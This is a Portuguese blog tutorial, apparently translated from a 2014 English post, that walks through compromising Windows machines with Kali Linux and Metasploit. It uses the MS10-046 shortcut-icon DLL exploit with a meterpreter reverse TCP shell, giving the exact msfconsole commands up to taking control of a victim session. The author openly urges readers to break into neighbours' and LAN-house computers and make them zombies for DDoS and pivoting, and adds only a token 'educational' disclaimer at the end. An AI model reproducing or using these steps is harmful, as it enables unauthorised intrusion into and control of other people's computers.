Como hackear um computador utilizando as ferramentas do kali linux







Aprenda técnicas rápidas e simples de invasão, como invadir qualquer computador Windows usando Metasploit.

Vamos invadir uns computadores por ai? Essa é a minha proposta! vamos aprender e invadir a vontade, acho que a segurança na informação só vai ser levado mais a serio para os usuários quando tudo começar a virar um caos.

Eu proponho invadir computadores pessoais e transforma-los em zombies para fazer deles o que bem intendermos. A segurança de informação é quase nula quando se fala de computador pessoal, isso devido a falta de informação que muito usuários tem, muito acham que basta instalar um ant-virus e pronto, estamos seguros, mas a realidade pode ser bem diferente.

Vamos pensar em uma rede, uma rede fechado, quem sabe a de uma lan house ou a rede do seu vizinho, você pode invadir o wifi dele (veja como fazer aqui) e a partir dai pegar as informaçães que precisar.

Por que invadir um computador?

Entre os mais variados motivos pessoais, existem os motivos não pessoais, um computador zombie pode servir para fazer ataques DDOS, ponte para outros ataques e nos mais variados casos para dar views a um site.

O que é o Metasploit?

Metasploit Project é um projeto de segurança de computador que fornece informações sobre as vulnerabilidades de segurança e auxiliares em testes de penetração e desenvolvimento.

Seu sub-projeto mais conhecido é o de código aberto Metasploit Framework, uma ferramenta para o desenvolvimento e execução de código de exploração contra uma máquina de destino remoto. Outros sub-projetos importantes incluem o Banco de Dados Opcode, arquivo shellcode e pesquisas relacionadas.

O Metasploit Project é bem conhecida por suas ferramentas anti-forenses e de evasão, algumas das quais são incorporadas ao Metasploit Framework.

Como hackear um computador?

Para fazer a invasão no computador você vai precisar de alguns pré requisitos, eles vão facilitar a invasão e transformar as coisas mais simples.

  1. estar na mesma rede
  2. utiliza e conhecer muito bem o framework metasploit
  3. Kali linux (ou qualquer outra distro que tenha o metasploit)

Msfconsole é de longe a parte mais popular do Metasploit Framework, e por boas razões. É um dos mais flexível, rico recursos.
Msfconsole fornece um prático tudo-em-um, interface para quase todas as opções; é como um balcão único para todos os seus sonhos de exploração.
Para iniciar msfconsole, digite msfconsole na linha de comando

msfconsole

01

agora, depois de obter o prompt de MSF digite o comando abaixo e olhar para o módulo de exploit/windows/browser/ms10_046_shortcut_icon_dllloader.

Aqui acima módulo explora uma vulnerabilidade na manipulação de arquivos do Windows de atalho (.lnk) que contêm um recurso de ícone apontando para um malicioso DLL.Esse módulo cria um serviço WebDAV que pode ser usado para executar um payload arbitrário quando acessado como um caminho UNC.

Agora, uma vez que tenhamos encontrado o módulo desejado, vamos utilizar esta façanha, digitando o comando a seguir.

msf > use  exploit/windows/browser/ms10_046_shortcut_icon_dllloader

02

Agora, uma vez que a exploração é carregado vamos definir a carga útil para o acima selecione exploit. Em nosso cenário estará usando payload TCP inversa. Digite o comando a seguir para definir carga útil.

A carga útil é o código que queremos do sistema para executar, selecionado e entregue pelo Framework. Um shell reverso é uma carga que cria uma ligação a partir do computador de destino de volta para o atacante como um prompt de comando do Windows, enquanto uma shell ligamento é uma carga que "Liga" uma linha de comandos para uma porta de escuta na máquina de destino, que o atacante pode se conectar.

#msf > set payload windows/meterpreter/reverse_tcp

Screenshot from 2014-05-21 04:03:40

Agora é hora de fazer algumas configurações para o Exploit / carga útil que acabamos de definir. digite o comando dado

#msf > show options

Você deve ficar abaixo de saída padrão.

Screenshot do 2014/05/21 04:03:56

Agora temos que definir o host local para ouvir. Digite o dado abaixo dois comandos.

#msf > set SRVHOST  192.168.31.20

Este será o seu IP HOST metasploit endereço de corrida.

#msf > set LHOST 192.168.31.20

Este será também o seu endereço de IP host executando metasploit.

Screenshot do 2014/05/21 04:04:46

Agora, verifique se a configuração do aplicado acima é aplicada.

#msf > show options

Screenshot from 2014-05-21 04:05:34

Agora, finalmente, vamos começar a explorar. Execute o comando Exploit.

#msf > exploit

Screenshot from 2014-05-21 04:06:21

Uma vez executado, devemos "Servidor Iniciado" (Certifique-se de que o servidor não está executando qualquer serviço da web na porta 80)

Em qualquer máquina cliente simplesmente abrir o Internet Explorer e tentar abrir http://192.168.31.20

Screenshot do 2014/05/21 04:30:07

Nota: ele vai dar o seu um pop-up pedindo a permissão, clique em Permitir e Certifique-se de que você não tem nenhum antivírus em execução no PC de destino.

Você pode verificar o número de sessão conectada bem sucedido, executando os sessons de comando no console do MSF.

Agora, como podemos ver que temos uma vítima ligada seu tempo para acessar o sistema. executar a sessão de comando -i 1.

#meterpeter > session -i 1

Uma vez conectado comando tipo linux para navegar dentro do sistema e tem total controle sobre ele.

Screenshot do 2014/05/21 04:18:37

Esta documentação é puramente para fins educacionais. assim, agir com responsabilidade.

Post original em > https://sathisharthars.wordpress.com/2014/05/21/hack-windows-7-with-metasploit-using-kali-linux/

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *